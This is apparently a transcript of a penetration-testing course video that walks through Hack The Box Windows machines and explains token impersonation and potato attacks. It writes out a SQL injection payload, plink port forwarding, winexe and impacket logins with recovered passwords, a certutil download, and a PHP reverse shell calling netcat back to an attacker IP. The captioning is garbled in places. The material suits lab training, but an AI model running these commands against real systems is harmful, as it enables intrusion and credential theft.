we've taken a look at the net users and we've taken a look at specific net users we're not on a domains we're not too concerned about that we could take a look at the firewall State we have looked at the ipconfig we haven't looked at the routing table or the ARP the chances are we're not really communicating with anything but we can take a look at ARP really quick as well ARP Dash a and we're only connecting with DOT two and Dot 255 so 
These are pretty common; nothing here that I would say is out of the ordinary. This is your broadcast address, and then your .2 is likely the router, or whatever it's routing through as the gateway, so nothing of particular interest there. Next on the list we have clear-text passwords. We could search through this individually with a findstr for "password", and we could run one of those long ones across .txt, .xml and .ini files, maybe across the whole C drive, and look through the C drive to see if there's anything out there. We can look for those backup files of the SAM, like we talked about in the enumeration video, and we can look at some of these other things as well, but I'm going to skip ahead just a little bit to the registry, because this could be a really quick win. We can do a quick search of the registry, and the reason I'm skipping down to the registry is that a findstr across something like the C drive is going to take a long time. I'm really looking for quick wins right now; if I don't get the quick win, then I'll start hunting down something that might take a little bit. I might set that step running for a while and do other enumeration while it runs, etc., but the registry is pretty quick, so I'm just going to copy and paste that and we'll take a look at what comes back. This is going to be difficult to look through, but we're going to try to spot something that looks like a password. I've already seen it show up, but if you scroll through this quickly, most of these don't really look like passwords; the further you scroll down, though, you see something along the lines of Welcome1! and DefaultPassword. On the note of Welcome1, or Welcome!, or anything along the Welcome1! lines: I see this more times than I want to admit in real pen tests. This is a very, very common password, so it's funny seeing it here, but
it's not a coincidence; it's something that really does show up with weak passwords. Going on from this, we just saw that we have a Welcome1, and we see it's in the Winlogon key. If we go back to our enumeration script and take a look at the Winlogon section down here, it says Windows AutoLogin, and we've got the Winlogon key here. Let's query that whole part of the registry, the Winlogon key, and get a little bit more information. We can just do a reg query; you could actually copy the same thing right here if you wanted to, but I'm just going to run the reg query command and it's going to search for me. Looks like I copied a space, which automatically triggered an enter for us. If we scroll through it, you can see that we've also got a username of Alfred and Welcome1!. Well, that's great: it looks like we may have just found Alfred's password. What could this do for us? We don't know yet. We don't have anything open on the machine, right? We don't have SSH or anything where we could log in as Alfred and maybe improve our shell, because we're in this funky shell where if I even hit tab or type a weird character it just doesn't work well for me. We'd like to improve it, but we don't have that option. If we had something like SMB we could do a psexec attack and try to elevate, but we don't have that option either, and with Alfred being a low-level user psexec really isn't going to work for us, so that's out. But what if, for example, Alfred is a user who is also an administrator, but they're just logging in as their regular account and then providing credentials when they want to do an administrative action? That's actually pretty common, right? So what we're going to think about is: maybe Alfred is just reusing his password. We've got these credentials, so we might as well give it a go and see. Now we're going to start piecing
some things together. We're going to do a port forward, and we're going to talk about that. To do that port forward, remember the netstat: we run netstat -ano again, and remember that we have 445 open. We could attack 445 if it were open publicly, so how can we do that? We can set up a port forward: we say, hey, I want this port to communicate with another port, and we'll forward it. How are we going to do that? We're going to use a tool called plink, and I want to download the latest version of plink, because you might have issues with the one that's built into Kali depending on the Kali Linux version you're on. So let's quickly go to Google and search for plink.exe with something like "putty download"; that's a good one. We're looking for the first release here, the chiark.greenend.org.uk page, which looks just like this. What we want to download is plink, and if we look at what plink is, it's a command-line interface to the PuTTY back ends. Do we know what PuTTY is? PuTTY is just an SSH/Telnet client. If you've never seen PuTTY, I've got an example of it here, and this is just what PuTTY looks like: you type in an IP address, you type in your port, and you say, hey, I want to connect to that. I use this all the time. So we're doing the same thing on the command line, using a tool called plink, which is going to allow us to run a port forward. I want to download the 32-bit version of plink, so go ahead and click on this and download it and save your file. What we're going to do is create a port forward. We need to open a new tab, so I'm just going to open a new tab here and blow this up. I put plink in my Downloads folder, which should be where it went; we can do a quick ls and grep for plink, and you can see plink.exe is there. So what I'm going to do is run a python -m SimpleHTTPServer on
port 80. Now, you can do this one, or you could do the Python 3 method if that's your choice; remember we can do it either way. I'm going to run this and then cancel, and we could do python3 -m http.server instead. I'm going to run the Python 2 one, just preference, it doesn't really matter. So Python 2 is running, and what we're doing is hosting this web server. We're going to go in and download this file. My favorite way to download a file is with a tool called certutil; certutil lets us do something similar to wget on Linux, and since we're in this kind of basic shell it's my go-to. So we'll cd over to the Users folder. You can also try doing it in temp, although when I did my first run through this machine I did not have a lot of luck in the temp folder. So we're in the Users folder, and we should have write privileges here. What I'm going to do is run certutil -urlcache -f, and the file is going to come from my machine; my machine is now at 10.10.14.5, my IP has actually changed, so 14.5. We're going to fetch plink.exe and just call it plink.exe. Okay, we'll do a quick check there and make sure plink.exe is there, and it is. Now, on the Kali side there is an important step we need to do. We need to come in here and do a quick apt install of an SSH server, so apt install ssh. I've already got this installed, and you may as well, but it doesn't hurt to run this command and see where you're at. If you do need to install it, go ahead and pause the video, hit yes on the install and let it happen. Then we're going to make a quick modification to SSH itself: we're going to run gedit and edit the sshd_config, and in here we're looking for a setting that says
PermitRootLogin. You see it says prohibit-password and it's actually commented out. We're going to uncomment this and set it to yes, permit that root login, and I'm going to save it. What that's going to allow us to do is log in as root, and here's what's going to happen. Go ahead and do a quick service ssh restart; make sure you restart your SSH service, and just to make sure it's enabled, do a service ssh start to make sure the service is started. Let's go back to our machine. We're going to use plink, and the command looks like this: plink.exe, then -l, where l stands for the username, and our username is root; then -pw for the password, and my password is toor, I'm very, very secure; then -R, and the capital R stands for the port forward. What this means is: on port 445 on this machine, I want to open that up, remember 127.0.0.1, and hand 445 out to the other machine, which is going to be us. So this is a port forward, and it's going to allow us to access this machine's port from our machine. If that's confusing, here's how it's going to work: just go ahead and hit enter. It's going to ask, hey, do you want to store the key in the cache? Just say yes. Now it's going to get to this screen, and yours might stick like this; just hit enter a couple of times and keep hitting enter, and you can see that you're brought to a root login. Now look, you're root@kali: you're in another box, you're in your own box, but you're in the box from within a box, it's like Inception. So we're going to run a command now, and we can check this. It's going to be funky because of the Inception situation we're in, but we can run netstat -ano and grep on 445, and when you run that command just hit enter a few times until it comes through. Okay, you can see it came through, and look, 127.0.0.1:445: we are
correctly connected to this machine; we have correctly port forwarded. This is something that took me a long time to get my head around, so just make sure you understand what's going on here: we are forwarding this port, which is only open internally, to us. We're allowing this connection over SSH; we're doing a port forward. If you need more information on that command, you can come back into this as well. Remember I said at the beginning of the video that you can come in here, look at this kind of printout, look at plink and see how you can do this. You can also do a port forward with Meterpreter, but we're staying away from that here. Here's information on what 0.0.0.0 means, all the way through, if you want some reading material. Okay, so the last thing we're going to do is use a tool called winexe. winexe is a Linux-based application that's going to allow us to execute commands on a Windows system. How are we going to do that? Well, we're going to give this a go; we don't know yet what's going to happen, but what I want to try is winexe, and the syntax is going to look something like this: we provide a username, I'm just going to say administrator, and then a percent sign; the percent says, hey, coming up next is the password, and we're going to say Welcome1!. Then I'm going to say do this over 127.0.0.1; that means we're connecting to 445 with winexe over 127.0.0.1, this port forward, and what I want to execute is cmd.exe, to try to get a command prompt. Now when I hit enter it's going to look like it fails, and we're just going to run this a couple of times until maybe something happens for us. And okay, we've got a shell. Now what kind of shell is this? Let's go ahead and run whoami, and again hit enter a couple of times, and you see chatterbox\administrator. Now this isn't the best shell to be in; however, we could run something if we wanted to
improve this: we could upload netcat, run certutil.exe with another -urlcache to upload netcat, then run netcat on this machine and get an improved shell if we want, one that's not all funky like this. But the goal of Hack The Box, or any capture the flag, or any lab, is to get administrator or SYSTEM on the machine, and we've done that: we've actually gotten administrator, which is the same thing as owning the machine. So this is the correct path. If you got this on your own, congratulations, that's really awesome; if you didn't, hopefully this makes a lot of sense. What we did was our basic enumeration; we didn't have to rely on any tools, and like I told you, we did this within a quarter of the page: the first quarter of the page had all the answers for us. So this is a good example of not relying on tools, of just the basic methodology of how we can do this from a hands-on perspective, and of not trusting everything you see. If you were doing this and you said, "Alfred, Welcome1, that's great, what do I need his password for?", well, you never know where that password is going to go. It could have gone to something like a web application or something else internal; we don't know. But if there's a credential being leaked, especially in a capture the flag situation, chances are it's meant to be there for some reason or another. So take note of everything you're seeing, especially these open ports and being able to do port forwarding, and these sorts of things like these passwords; they come up all the time. From here we're going to move on and start talking about the Windows Subsystem for Linux, which is a newer feature that just came out, and we're going to see how a misconfiguration could allow for a complete privilege escalation. So I'll see you over in the next segment. Next up is the Windows Subsystem for Linux. Now, this was initially released in
2016 and allows you to run Linux on top of your Windows system; it's basically a subsystem. What this does is let you run something like Ubuntu or even Kali Linux right on top, without having to use a VM or anything else. Now, this does have some vulnerabilities to it. As you can see here on our little cheat sheet from PayloadsAllTheThings, with root privileges it allows users to create a bind shell on any port with no elevation needed: don't know the root password? No problem. Here are some commands we can run: we can run wsl whoami, and it'll say, hey, we're root, and then we can try to run a Python-style reverse shell. Now, this is a big hint for the box coming up. If you want to try it all the way through, this is not actually going to work; in fact, we're going to use a little bit of Linux privilege escalation to get root on our machine. I'm doing this box to get you thinking about the Windows Subsystem for Linux, in case you ever see it pop up while you're doing enumeration, because this is in fact a way to escalate. However, it's not going to be fully there; there's going to be a bit of an alternate path to actually get a full SYSTEM shell on the machine. Keep in mind that bash.exe exists, and we're going to go into that as well. So what we're going to do is spin up a box called SecNotes, and it lives at 10.10.10.97. What I want you to do is hit play, get your box scanned and give it a go; see if you can get a low-privileged shell on this machine. Catch me in the next video; we're going to walk through it and then we'll talk through the escalation. All right, let's look at our nmap scan. We've got three ports that came back: we've got HTTP on port 80, HTTP on port 8808, and then SMB on port 445.
Now we see Microsoft IIS, which tells us this is a Windows machine, and we see the SMB enumeration here, which says Windows 10 Enterprise. If we scroll down a little bit, it also says Windows 10 Enterprise 6.3, and we've got 17134, so we've got a bit of OS information right here if we're looking for any sort of exploit related to that. We also see the computer name is SECNOTES, and we've got the workgroup of HTB, for Hack The Box. So the thing we should probably do is go out and explore these web pages, and we'll leave 445 for later. Though, what we can do with 445 if we want to do some basic enumeration is come out here, close my tabs, and run smbclient with a quick -L to list, and give it 10.10.10.97, to see if we can list this out. Hit enter, and we get access denied; that's why we're not going to enumerate SMB first. Now let's go to port 80, because it does look like it has a login page, whereas port 8808 just has a basic IIS Windows titled page. So let's first explore port 80.
So if we go to 10.10.10.97, we can see we're given a login page, and it says, hey, give us your login credentials and log in; if you don't have an account, sign up. So let's just sign up for an account and see what's going on inside. We'll say TCM, I'll give it a password of TCM twice, and the password must be six characters in length, so I'll do TCM123. Okay, let's try logging in with that, and we can see we're viewing secure notes for TCM. It looks like we can create some notes; maybe "test", put a test note in here and save it. Okay, so we've got our test note. We can change our password, we can sign out, and then there's a Contact Us, where you can send a message to this tyler@secnotes.htb. So it looks like we have username enumeration here: at least we know the user's name is Tyler, so that might help us a little bit later on. When I see a login page, I'm immediately thinking some sort of SQL injection exists here, so I'm going to try that first. I might try something on the login page like a ' or 1=1, and then something like this, and see if that works, and use that in both fields: no account found with that username. We could even try just a quote to generate an error here, and it's saying no account found with that username. Okay, so maybe we don't have SQL injection here, or maybe we run this through something like Burp Intruder and see if we can get some sort of different response to come through. But for the sake of time and for the sake of this class: we don't have SQL injection on this page itself. Where the SQL injection actually exists is on the sign-up page, which would be the next place to try. When we're doing any kind of web app testing, and this is real-world experience here, I want to see what kind of malicious items I can dump into these pages and get something back. So I'm looking at whether I can maybe create even something like a
<script>alert(1)</script> username, for example. If I'm testing a website and I'm allowed to make a username like that, and then I log in and cross-site scripting pops up, that's not good. The same goes for SQL injection: what if I did something like ' or 1 or ', which is just a common payload? And you can again run through the different payloads and see what works. So you can take something like Burp Intruder, open it up and do an example here, where we say, hey, I want to create something, and I'm just going to hit OK. You should be familiar with Burp Suite by this point, so I'm not going to give you the full walkthrough, but we can start Burp Suite and use something like FoxyProxy to turn on our proxy. All FoxyProxy is doing, if you've never seen it before, is setting our preferences for us: typically for Burp Suite we would have to manually set the intercept to 127.0.0.1 on 8080. FoxyProxy just allows us to come in here and say, hey, that's exactly what I want to do with Burp Suite, I just want 127.0.0.1 on port 8080, and it'll set it for us. It's a quick flip of a switch instead of having to go into preferences and dig in, etc. So we can come in here and say, okay, I want to do this; I'm going to use the same password and confirm, and I'll intercept this request. You'll see it goes into Burp Suite, and we can decide to forward it or do whatever we want with it. I can send this to Intruder, and, just as an example, I can give it different parameters. I can clear all of these and say, hey, I want 123 here, just for the confirm, and okay, for the payloads, what I want to set all the payloads to is this SQL injection. Maybe I do ' or 1 or ', or we do the one we just saw, ' or 1=1 -- -, and with this sniper attack, what it's going to do is try to
create a username in all these fields; it's going to put this one payload we set into every field that's marked here. If we wanted to do other attacks, we could do something like a pitchfork, where we'd have three different payloads, for example, and we'd say, hey, for payload one, or position one, we're going to put this here, and for payload two we'll put something else. But for this I just want them all to be the same, so I'm going to do a sniper attack and start the attack. Burp Suite takes its sweet time for this, and that is what it is, because we're on the Community Edition. We can look at the response and see what happens: the username's already taken. That's okay, somebody's probably already been on this box, no worries about that. Same thing with this one; looks like people were trying this. That's okay, if you're getting "username already taken", don't worry about it. On this one at 1854 you can see the payload changed slightly, but it says the username's already taken as well. So we're just going to do the manual method: I'm going to turn the intercept off, and it's going to say this username is already taken as well. I'm going to go back to the home page and try to log in with this injected account, and you can see now it says "viewing secure notes for ' or 1 or '". Right, so we're ending something here, saying or 1 or, and then starting something, which just completely removes everything else, and we're getting the information for everybody. You can see the test note that I made here, 4/19/2020.
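The sign-up injection just described, as an added example that is not part of the course video or of the SecNotes application itself: a small Python model of the bug class, where a username accepted verbatim at sign-up is later spliced into the query that fetches that user's notes. The schema, the sample rows, the "vulnerable" and "safe" query functions and the password values are all constructed for this demo and are assumptions about how such an app might be built, not the real SecNotes code; the one thing taken from the walkthrough is the `' or 1 or '` username payload.

```python
import sqlite3

# The injected username from the walkthrough. Once it is stored as a username,
# every later query that builds SQL by string concatenation around it is affected.
PAYLOAD = "' or 1 or '"

VULNERABLE_QUERY = "SELECT username, title, body FROM notes WHERE username = '%s'"


def build_db():
    """In-memory SQLite database with constructed sample rows (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(r"""
        CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT);
        CREATE TABLE notes (username TEXT, title TEXT, body TEXT);
        INSERT INTO users VALUES ('tyler', 'constructed-password');
        INSERT INTO notes VALUES ('tyler', 'new-site', '\\secnotes.htb\new-site tyler:<constructed>');
        INSERT INTO notes VALUES ('tyler', 'sticky buns', 'constructed ingredients list');
    """)
    return conn


def register(conn, username, password):
    """Sign-up as modelled here: the username is stored verbatim, with no validation.
    This INSERT is itself parameterised, which is exactly why the payload survives
    intact instead of breaking the sign-up query; the damage comes later."""
    conn.execute("INSERT INTO users VALUES (?, ?)", (username, password))


def add_note(conn, username, title, body):
    conn.execute("INSERT INTO notes VALUES (?, ?, ?)", (username, title, body))


def rendered_sql(username):
    """The SQL text the vulnerable path runs for a given logged-in username."""
    return VULNERABLE_QUERY % username


def notes_vulnerable(conn, username):
    """The bug: the logged-in username is concatenated into the WHERE clause.
    With PAYLOAD the clause becomes  username = '' or 1 or ''  which is always true,
    so every user's notes come back: the 'notes for everybody' seen in the video."""
    return conn.execute(rendered_sql(username)).fetchall()


def notes_safe(conn, username):
    """The fix: bind the username as a parameter, so the payload is only a string value."""
    sql = "SELECT username, title, body FROM notes WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def demo():
    conn = build_db()
    register(conn, "tcm", "TCM123")
    add_note(conn, "tcm", "test", "test note")
    register(conn, PAYLOAD, "TCM123")  # the sign-up step from the walkthrough
    return {
        "tcm_own_notes": notes_vulnerable(conn, "tcm"),         # 1 row: behaves normally
        "payload_vulnerable": notes_vulnerable(conn, PAYLOAD),  # all 3 rows: Tyler's note leaks
        "payload_safe": notes_safe(conn, PAYLOAD),              # 0 rows: no such user
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, len(rows), rows)
```

In this model a second sign-up with the same payload fails on the users PRIMARY KEY, which is the "username already taken" behaviour the Intruder run hit: the payload account only needs to exist once for anyone who logs in with it to see every note.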
We can see the Mimi sticky buns ingredients; the whole database is being dumped out for us, and here we can see that there is a \\secnotes.htb\new-site, which looks like an SMB share, we've got tyler, and then what looks like credentials here. So that's good: we've basically done SQL injection, gone into this website, dumped these credentials out, and now we can use them to try to get a shell on this machine. So what I'm going to do is try psexec, for example. Just in case you want to know, here's psexec.py from the impacket toolkit, psexec.py, and we're going to say, hey, I want to connect. Let's do a --help; this is just to prove a point here, you don't have to follow along. We need a username, password and IP address, so I'm going to supply tyler, then the password, which is on this page, in quotes, and then the IP address of 10.10.10.97.
I'm going to try to run this, and you're going to see: okay, ADMIN$ is not writable, he's not an admin; C$ is not writable; found a writable share, uploading a file, and it's not able to open it up. It's trying, it's not able to open it up; sometimes it errors out. I'll give it a second go, but for me this wasn't working. So this is like a quick win: I'm just thinking, hey, maybe with psexec I can upload some sort of malware, get on the machine and go. Maybe there's antivirus or something blocking this, like Windows Defender or something along those lines, saying nope, you can't do this sort of attack, I'm going to block it. So we're not getting in here. The other route we can take is to go explore the new-site share and see what's there. So let's try that: we'll run smbclient, and we'll do something along these lines, 10.10.10.97, then new-site, and we'll provide a username of tyler, just like that. It's going to ask for Tyler's password, which is right here; I'm just going to copy that again and paste it here. Okay, and we got in. Let's do a quick ls: we've got this iisstart and this IIS .png, which reminds me of a default home page, similar to Devel from the beginning of the course, right? Well, where might we have seen that already? If we go back to our nmap scan, you can see that we possibly saw a default IIS page over on 8808, so if we go look at 8808 we can maybe confirm that. Let's go to 8808 here and see what's going on. Okay, so we do have a default page. Now, to skip a step: the wheels are spinning in your mind, and you're probably thinking, well, maybe I could just do a Metasploit payload and try to run that, get it to go with an .aspx. I tried that as well, and it does not work, so we have to think outside the box. Something is going in there and deleting things very, very quickly. It could be antivirus again; there could be a script running saying, hey, delete everything out of here that doesn't belong. I'm
guessing we're probably up against some sort of antivirus, but we're not sure at this point. So what we can do is say, well, we're in here; maybe I can upload something like netcat and then run a malicious PHP shell, or something along those lines. If you've never seen this before, let me walk you through it. On your box, your Kali machine, you have netcat.exe: you can do a quick locate netcat.exe, and you can see we've got this /usr/share/windows-resources/binaries/netcat.exe. We've talked about this in the past, right? Well, let's do something like this: we'll cp that path to netcat.exe right in the root folder, so we're just copying this binary into our root. Then we go over to this SMB session, which we launched from root, and say put netcat.exe. Then what we can do is use a malicious PHP file. I've gone ahead and created one, so let's check it out: I've called it rev.php, and we can look at the command. We're saying, hey, when we run this, execute something on the system: you're going to execute netcat.exe, which executes cmd.exe, and we say 10.10.14.5, that's my IP address, and then I'm going to listen on 4444. So it's going to be a basic reverse shell written in PHP. Okay, go ahead and get that typed out, pause if you need to; I'm going to close out because I've already got it saved, and then we're going to run this. We'll do a quick ls to make sure our netcat's still there, and it is. I'm going to put this rev.php, and I'm going to run a netcat listener, nc -nlvp 4444, and we're listening. I'm going to go to the web page and just browse to rev.php, and it's stalling, which is usually a good sign. We can come in, and you can see, okay, hey, we're at C:\inetpub\new-site. Do a quick whoami: secnotes\tyler, and then
we can just do a quick systeminfo to get a bit of information about this computer, etc. But what we've done up to this point is gain access. Oh look, systeminfo is actually denied. Let's do a quick query too and see if we're up against WinDefend; well, we might be. Here it is, running. So the Windows 10 version of this is probably doing a lot better job than the Windows 7 we've seen in the past, so there's a good chance we're actually up against some sort of antivirus. But from here, I want you to do a little bit of thinking outside the box on your own. I really do believe that, with a little bit of guidance from this article, the PayloadsAllTheThings one again, from your course resources, you can do this: look at this closely, use commands you can run against the machine to find where bash.exe or wsl.exe exists, figure out how that might work for you and how you can use it, and see what level of user you are. I kind of gave it away, you're going to be root, but do a little bit of enumeration, try to get into the system itself, go from there, and see if you can figure out how to find your way to escalate privileges to SYSTEM. I have faith in you. In the next video, though, we're going to walk through this, and I'll show you exactly how to find this file, how we're going to abuse it and how we're going to elevate privileges. Okay, so I'll see you over in the next video. Okay, so here we are: we're ready to figure out this escalation, and we know it has something to do with the Windows Subsystem for Linux. So what can we do with that? Well, we have a little cheat sheet guide, we talked about it, and we know that wsl.exe exists and bash.exe exists, so we could try to find both of those quickly. If we go to our terminal and run something along the lines of where with /r, r just means recursive, we're going to look and see, and I'm actually going to expand it to
C:\Windows, I think it's hiding in Windows somewhere, and we'll look for bash.exe. Now, you could use find or any other command you like for this; this is just how I use it to find it quickly. You can see there is the bash.exe, and we can do another quick one of these, where I copy this and run it against wsl.exe, to see where those are hiding. So let's do a quick one on wsl.exe, and I'm guessing it's in this WinSxS folder as well, because that's where everything else related to the Windows Subsystem for Linux has been. You can see the wsl.exe here. We can run pretty much any of these and see what's going on. bash.exe will bring up a bash prompt, but remember we could do something quick like a whoami through this wsl.exe: we can paste the path and say whoami, and it should return root, and you can see there, it did return root. Now, remember I told you that you can't run this here, but if you could, with wsl python -c you could run a Python reverse shell, or even a bind shell here and open up a port. However, that's not the method of exploitation here; that's not the true escalation we're going to do. So let's run bash.exe and drop into a command prompt, well, a Linux terminal I should say. Okay, so it says ttyname failed: inappropriate, okay, that's fine. Let's just say whoami: root. hostname: we're on SecNotes, but don't let this fool you; this is just the Linux side of SecNotes. We can do a quick uname -a and see what we're on: we're on a Linux machine, for Microsoft, so we're on this Subsystem for Linux. Now, we're in a non-TTY, so what we need to do is try to elevate, or escape, here. We're going to do a quick python -c with import pty and then pty.spawn, and give it /bin/bash; let's see if that works. Okay, now you can see we have root@secnotes. Now, if you're ever concerned with TTY escapes and see something along those lines, you could
search for a TTY escape cheat sheet, which is usually what I go with; "spawning a TTY shell", this netsec.ws page here is really, really good. You can just come in here, click on it, and you can see here's where the Python command came from; I just did a bash instead of an sh. There's echo, there are all kinds of different options to try to spawn a TTY shell. So now we have a TTY shell; that's great. Now, we haven't done any sort of Linux enumeration in this course because it's a Windows course, but some of the quick things I like to do when I'm looking are to get the lay of the land and ask, hey, what's my present working directory? pwd: I'm in /root. Okay, do an ls -la, and we can see, okay, well, nothing going on here. We do have a .bash_history, which we could read with the history command, or just cat it out. I always check the history command; that's one of the first things I check when I'm doing any sort of Windows or Linux privesc. I also like a sudo -l, although I don't think that'll run here. So I already see something very, very interesting, and this is actually really common if you're doing Linux privesc: if you run history, you see easy wins in history all the time. It's one of the quick wins. Look at this command here: smbclient -U administrator, here's a password, here's 127.0.0.1 and C$. Well, we can run this command. This is it, we win, we're going to get root. We can run this command, and this will give us our access to the file system. So let's take a quick look; I'll show you. If we just open up a new tab and paste that in, and we give it the IP address instead of localhost, the IP address that it wants, what else did it ask for? C$, it wants to connect to the C drive, so we say C$, and ls, and you can see, okay, we've got full access over this system. But that's not really a shell. We could go in and get the flags; they're trying to capture the flag here, but that's
not the true way. So let's exit out of this. Again, I mentioned impacket before, and I mentioned psexec. Now, I realize that maybe you've never used impacket; it's expected that you know what it is at this point, because this isn't fully a beginner-level course, but I'm going to show you really quick. You can go to the impacket GitHub, if you've never heard of this, the SecureAuthCorp one right here; just click on this link. It's very, very easy to install: you can do a quick Clone or download, grab this link here. I always put this in my /opt, so I would cd /opt, then git clone and paste this in; I'm not actually going to do it because I already have it. Hit enter on that, then cd into your impacket folder and run pip3 install ., and it'll install it. Now, I think the original calls for pip install; if you're on Kali 2020 or later you're not going to have pip installed by default, because now Python 3 is the way to go. So let's imagine you've done all that, or you have it ready to go. Let's take these credentials and try to do something with them. We did the psexec before, and we can try it again; I'm going to show you this is actually very real-world. So say you try psexec, it's an easy win: you use administrator, and something along the lines of pasting that password, at 10.10.10.97.
Okay, it's going to try to connect, and it found the ADMIN$ share writable. That means we have admin privileges; we can write to ADMIN$. It's amazing, that's what you want to see, except what do we have happening? Looks like we have some sort of antivirus blocking this again. This is very common, so if I were to see this on an assessment, I'd kill this and try something else. There are a few different execs: there's smbexec, which does a very similar thing and gives us kind of a half shell, so I'll try smbexec here. Another one is called wmiexec. I always try all three; you never know where you're going to get lucky. And now you're in this semi-interactive shell; you can say whoami, and it's going to return NT AUTHORITY\SYSTEM. So we are SYSTEM on this machine. We do have a full shell, we have full control; we can use the netcat that we found, spawn a quick reverse shell and get another shell on this if we want something fully interactive as opposed to semi-interactive, but at this point this is full ownage of this machine. So I hope you were able to take it this far; if you weren't, that's okay, you're in this class to learn. Keep challenging yourself as we go through these challenges. The challenges are going to get a little bit harder as we go, up until we get to the lab section of our course and then into the capstone. From here we're just going to keep doing walkthroughs, and we're going to try to build up that mentality of how to do enumeration; you'll have a few hints to go along with it, and then you'll build it all up as we go. So keep challenging yourself; if this is a struggle, that's absolutely okay. But I will see you in the next section, where we're going to be covering impersonation attacks. This is some of my favorite stuff; it gets down to the real world, and we're going to do one of my favorite Hack The Box machines as well. So I will see you guys in the next section. All right, so
we've come to a bit of a meaty part of the course, where we're going to do a few videos in a row that are a little bit of death by PowerPoint, but I really need to get the point across as to what we're doing and why we're doing it, so that you have a better understanding of the attack that's about to come. This first part of the videos is on token impersonation, which, if you've done the other Udemy course, you've seen in the Active Directory portion. This is a very, very real thing that we see on assessments, and you're going to see how it comes into play when it comes to attack time. I'm going to show you a quick overview; we'll talk about token impersonation, and then we'll start talking about the different privileges you might see on a machine, and the potato attacks. So, token impersonation: what are tokens? Tokens are basically like cookies for your computer. They are temporary keys that allow you to have access to a system or a network without having to provide credentials each time you access a file. There are two types: there's a delegate token and an impersonate token. The delegate tokens are what we're going to see most often; you're looking at somebody logging into a machine, or even remote desktop. Let's say you have a situation where you're sitting at a computer and somebody comes over, switches user and logs in as a user: well, they're leaving a token behind, just as you're leaving a token behind. An impersonate token is used by a script more than by that kind of interaction, like attaching a network drive or a domain logon script; those are a little bit different, and you don't see them as much. So we see a lot of delegate tokens, and you're going to see an example here of why that's going to be bad. Just think of somebody like a domain admin logging in, or the help desk logging into a computer, and just leaving a token behind. Who knows when that computer is going to get rebooted? And that's the only time these tokens go away. So let's take a look
at why this is bad so here is an example from a lab that I had set up where we have a regular user named Frank Castle and we load this tool called Incognito which you're going to see here in just a little bit and this is part of interpreter we list the tokens out and we say hey I have Frank Castle here and I want to impersonate Frank Castle so we just say impersonate token I'm impersonating Frank Castle if you go into a shell you are this user so we say who am I Frank Castle okay well let's try to run Mimi cats and we're going to run Mimi cats which is going to attempt to dump the LSA off of the domain controller here which is this hydra.marvel.local all we're doing is something really malicious we're trying to dump all the hashes from the domain controller well this person's not a domain admin so we're getting access is denied however what if a domain admin token was available or an administrator token or a system token don't think of this just from an active directory even though this is an active directory example think of this for for any sort of escalation here if you see an administrator token when you go list all tokens and you say hey I want to impersonate this token guess what you can drop into a shell and now you are the administrator and you own everything from an active directory perspective if you can run mimikats remotely you can dump the LSA and you can get uh very sensitive hashes including the Kerberos hash which allows you to create golden tickets and do a lot of nasty nasty things in the network so going back just a little bit here remember we're looking for any sort of token that's available to us so if we see the administrator token we Elevate into that token we are the administrator we control that machine it's game over so that's what token impersonation is and it's really really bad and does show up in the real world so in the next video we're going to look at the get privs command and the who am I slash all command and look at some of the 
different privileges that you might see on a system and how they can relate to being bad and then this is all going to tie together in the third video when we talk about potato attacks so I will catch you over in the next video all right I'm gonna try to stay away from the PowerPoint in this video so let's say that we've owned a machine and we run the who am I slash prayer remember we ran this in the enumeration section and we pulled down these different Privileges and you can see kind of a description that comes back this is an example if we are on just a regular shell where we've dropped into a shell who am I slash priv pull down privileges we could see some of these some of these really okay if we have the ability to shut down a system here we don't can we move a computer from docking station we don't have that privilege either so some of these are just like okay I don't see the escalation here and that's probably because there isn't really an escalation change the time zone Etc but there are some of these that are bad like this impersonate privilege now think about what impersonate is token impersonation yes you got it so impersonates one of the bad ones uh this change notify could be one as well bypass Traverse checking there's a few in here that are bad now just as another example I can bring up The Interpreter version of it which is just get privs and you can see we've got the same kind of things in here uh just shows you the Privileges from a different perspective and it just says SE change notify privilege so you can see what privileges are enabled on this system now there are several that can be malicious now of course I'm going to come back to our uh payload all the things and show you some of these impersonation privileges so if you're interested this is where it's at this tells you a little bit more about it and how they are important there's also a if you click on this right here private admin there's a list of all the different types of Privileges 
and how they can be escalated or potentially escalated or if they're even worth escalating so this is a great resource as well but here are the key common ones and I'm not going to cover all of these in depth but let's talk about them now SE assigned primary token this is the same thing as the impersonate you'll see that impersonates actually not on this list but it's the same thing and look it says this allows us to impersonate tokens and priv S to the NT system using tools such as potato rotten potato and juicy potato a little bit of foreshadowing potato chacks all right uh backup if we can if we can perform backup we can read sensitive files create a token we can create tokens okay and it kind of tells you just along the lines of what we're capable of doing here if we have debug we can duplicate the lsas that's pretty good uh the restore as well and SC take ownership is another big one where you can take ownership of a file so that's also uh one if you see this enabled really the one that we're looking for is this SE assigned primary token or SC impersonate so if you see that running immediately just think hey I might have a potato attack here so in the next video we'll talk about what these potato attacks are and how they're important I just want to get your wheels spinning right now on these different uh these different privileges that allow us to escalate okay so this Focus for this segment is going to be the assigned primary token or again that impersonate privilege okay so SE impersonate so let's go ahead and move on to the next video where we talk about potato attacks what they are and then we're going to move on to our box and see how we can exploit using potato attacks all right so on to the potato attacks now Fox Glove security is the blog of choice here as they release the full details on what the potato attacks are now if you're into the nerdy stuff I'm going to link this you can come down here and read all the fine details on how they created this 
exploit and how it fully works but what we really need to know at a high level is these top three things and really number three is what we're looking for so it says Hey to describe this at a high level we're going to trick The Authority system account into authenticating via ntlm to a TCP endpoint Wii control alright so we control a TCP endpoint the man in the middle this authentication attempt to locally negotiate a security token for the NT Authority system account this is done through a series of Windows API calls last one impersonate the token that we've created this can only be done if the attacker's current account has the privilege to impersonate security tokens this is usually true of most service accounts and not true of most user level accounts so if you take control of a service account you might just have this impersonate token so let's take another look at this this is Juicy potato it just says it's a sugared version of rotten potato it's just another version of this and another exploit so again you're going to come in here and you're going to see hey juicy potato well it's leveraging the Essie impersonate or the SC assigned primary token these are the big things we need to be on the lookout for so you're going to see this come up quite a bit especially on hack the box or those other CTF type machines where you're on it and you're just like hey I'm gonna see if this is vulnerable I'm going to check my privs and this could be just a quick game over so you want to check these see if there's a vulnerability there and just get used to doing the get privs process or the the who am I slash privs process so from here now we're going to jump into hack the box so what I want you to do is I'm going to come over here I want you to go ahead and scan Jeeves and try to attack it now I fully believe that you should be able to get the low level user by yourself Jeeves is a great example of things that I actually see a lot in internal assessments so I'll talk about 
